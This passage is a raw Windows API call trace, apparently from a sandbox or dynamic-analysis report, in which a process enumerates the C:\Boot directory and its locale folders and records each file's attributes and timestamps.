ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0154.537] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0154.538] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0154.538] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0154.538] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0154.538] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0154.538] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0154.538] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.539] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0154.539] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0154.539] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.539] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.539] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1b0975c0, ftLastAccessTime.dwHighDateTime=0x1d5fc36, ftLastWriteTime.dwLowDateTime=0x1b0975c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0154.539] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x1ab162e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0154.539] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0154.539] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0154.540] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0154.541] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0154.542] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, 